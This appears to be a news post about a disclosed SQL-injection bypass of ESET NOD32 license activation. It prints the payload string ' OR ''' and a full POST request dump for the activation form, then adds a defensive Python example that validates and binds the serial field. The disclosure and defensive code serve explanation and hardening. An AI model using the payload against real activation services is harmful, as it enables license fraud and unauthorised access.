An ESET vulnerability has been uncovered by Egyptian geeks. This authentication bug allowed a security researcher to generate millions of valid licenses for NOD32 antivirus, ESET's major product, for free.
How Are Authentication Bugs Used?
Many applications require users to authenticate in order to access information or gain additional permissions, but some authentication methods are less secure than others. The weaker ones allow users to bypass security by simply jumping from the login page to a backend location that is supposed to be reachable only after successful authentication. Some hackers trick an application into thinking that they have passed its authentication checks and are allowed to access it by making changes to the URL, sessions or forms.
In the Software Development Life Cycle (SDLC), authentication problems might reside in design, development or deployment. Authentication can be bypassed by the following methods:
- SQL Injection
- Session ID guessing
- Direct Page Request
- Modification of Parameters
The security researcher published the following details about exploiting this vulnerability:
[*] Vulnerability Type : A2 – Broken Authentication and Session Management
[*] URL / Service:
[*] Vulnerable Parameter(s) / Input(s): “serial” (Product Key field)
[*] Payload / Bypass string: ' OR '''
[*] Request full dump:
POST /me/activate/reg/ HTTP/1.1
Host: eu-eset.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://eu-eset.com/me/activate/
Cookie: [*]
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------25242107630722
Content-Length: 885

-----------------------------25242107630722
Content-Disposition: form-data; name="serial"

' OR '''
-----------------------------25242107630722
Content-Disposition: form-data; name="country"

20
-----------------------------25242107630722
Content-Disposition: form-data; name="firstname"

Mohamed
-----------------------------25242107630722
Content-Disposition: form-data; name="lastname"

Abdelbaset
-----------------------------25242107630722
Content-Disposition: form-data; name="company"

Seekurity
-----------------------------25242107630722
Content-Disposition: form-data; name="email"

[email protected]
-----------------------------25242107630722
Content-Disposition: form-data; name="phone"

12345678911
-----------------------------25242107630722
Content-Disposition: form-data; name="note"

-----------------------------25242107630722--
By using the above-mentioned method, one gets a free paid license of ESET Nod32 Antivirus valid for 365 days! Such a license costs $29 on the official ESET Store.
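A server-side check for a product-key field such as "serial", as an added example (not ESET's code; the page does not describe the backend). It assumes a SQL-backed license table and a hypothetical key format, rejects malformed values before any lookup, binds the value as a parameter so quote characters are never parsed as SQL, and redeems each key only once.

```python
import re
import sqlite3

# Hypothetical key format (assumption): four dash-separated groups of A-Z/0-9.
SERIAL_RE = re.compile(r"[A-Z0-9]{4}(?:-[A-Z0-9]{4}){3}")


def make_db():
    """Constructed in-memory license table: one unused key, one already redeemed."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE licenses ("
               "serial TEXT PRIMARY KEY, redeemed INTEGER NOT NULL DEFAULT 0)")
    db.executemany("INSERT INTO licenses VALUES (?, ?)",
                   [("AAAA-1111-BBBB-2222", 0), ("CCCC-3333-DDDD-4444", 1)])
    return db


def activate(db, serial):
    """Return (ok, reason). Fails closed unless exactly one unused key matches."""
    if not isinstance(serial, str) or not SERIAL_RE.fullmatch(serial):
        return False, "malformed"
    # Bound parameter: the value is data, never SQL text. The conditional
    # UPDATE makes redemption single-use even if the request is replayed.
    cur = db.execute(
        "UPDATE licenses SET redeemed = 1 WHERE serial = ? AND redeemed = 0",
        (serial,))
    db.commit()
    if cur.rowcount != 1:
        return False, "unknown-or-used"
    return True, "activated"


def lookup_bound(db, serial):
    """Bound lookup without the format check: binding alone keeps quotes inert."""
    row = db.execute("SELECT 1 FROM licenses WHERE serial = ?",
                     (serial,)).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    # First value is the string from the report above; the rest are constructed.
    for value in ["' OR '''", "AAAA-1111-BBBB-2222",
                  "AAAA-1111-BBBB-2222", "ZZZZ-9999-ZZZZ-9999"]:
        print(repr(value), activate(db, value))
```

Logging the "malformed" outcome per source address gives a simple signal for probing of the activation form.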
Image Courtesy of Hit2k